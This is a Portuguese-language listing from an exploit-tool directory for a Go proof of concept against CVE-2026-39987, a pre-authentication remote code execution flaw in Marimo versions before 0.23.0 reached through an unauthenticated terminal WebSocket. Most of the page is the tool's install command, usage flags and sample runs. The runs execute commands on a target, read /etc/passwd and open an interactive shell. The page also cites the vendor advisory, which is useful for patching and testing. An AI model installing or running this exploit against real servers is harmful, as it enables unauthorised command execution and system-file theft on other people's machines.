Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-39987 — Explora RCE pré-autenticação CVE-2026-39987 no Marimo <0.23.0 conectando-se ao WebSocket /terminal/ws não autenticado. Suporta execução arbitrária de comandos, entrada via pipe e sessões interativas de shell. | Kitploit
Ferramentas/GitHubGitHub/matesz44/cve-2026-39987
Autenticação e AutorizaçãoExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubmatesz44/cve-2026-39987

cve-2026-39987

Explora RCE pré-autenticação CVE-2026-39987 no Marimo <0.23.0 conectando-se ao WebSocket /terminal/ws não autenticado. Suporta execução arbitrária de comandos, entrada via pipe e sessões interativas de shell.

Ver Repositório
6há 28 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar


cve-2026-39987

Instalação • Uso • Exemplos

Estou apenas experimentando Go :D Aliás: CVE-2026-39987 PoC: Marimo<0.23.0 Execução Remota de Código Pré-Autenticação via Bypass de Autenticação do Terminal WebSocket (sem verificação de authn em /terminal/ws).

Recursos:

  • https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
  • https://nvd.nist.gov/vuln/detail/CVE-2026-39987

Instalação

root@kitploit:~
go install -v github.com/matesz44/cve-2026-39987/cmd/cve-2026-39987@latest

Uso

root@kitploit:~
cve-2026-39987 -h

Isto exibirá a ajuda para a ferramenta. Aqui estão todas as flags que ela suporta.

root@kitploit:~
CVE-2026-39987 PoC: Marimo<0.23.0 Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
- Source: https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc

Usage:
  ./cve-2026-39987 [flags]

Flags:
   -t, -target string  Target WebSocket URL (required, e.g., ws(s)://[TARGET]:([PORT])/terminal/ws)
   -c, -cmd string     Command to Run (default "uname -a")
   -i, -interactive    Interactive Mode

Exemplos

Comando Padrão (uname -a):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws
REDACTED@REDACTED:~$ uname -a
Linux [...]
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

Comando Personalizado (-c):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws -c "cat /etc/passwd"
REDACTED@REDACTED:~$ cat /etc/passwd
exit
root:x:0:0: [...]
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

Modo Interativo (-i):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws -i
REDACTED@REDACTED:~$ id
id
uid=1000(REDACTED) gid=1000(REDACTED) groups=1000(REDACTED)
REDACTED@REDACTED:~$ whoami
whoami
REDACTED
REDACTED@REDACTED:~$ exit
exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

Pipe:

root@kitploit:~
printf "id\nwhoami" | cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws
REDACTED@REDACTED:~$ id
whoami
exit
uid=1000(REDACTED) gid=1000(REDACTED) groups=1000(REDACTED)
REDACTED@REDACTED:~$ whoami
REDACTED
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended
Baixar ferramenta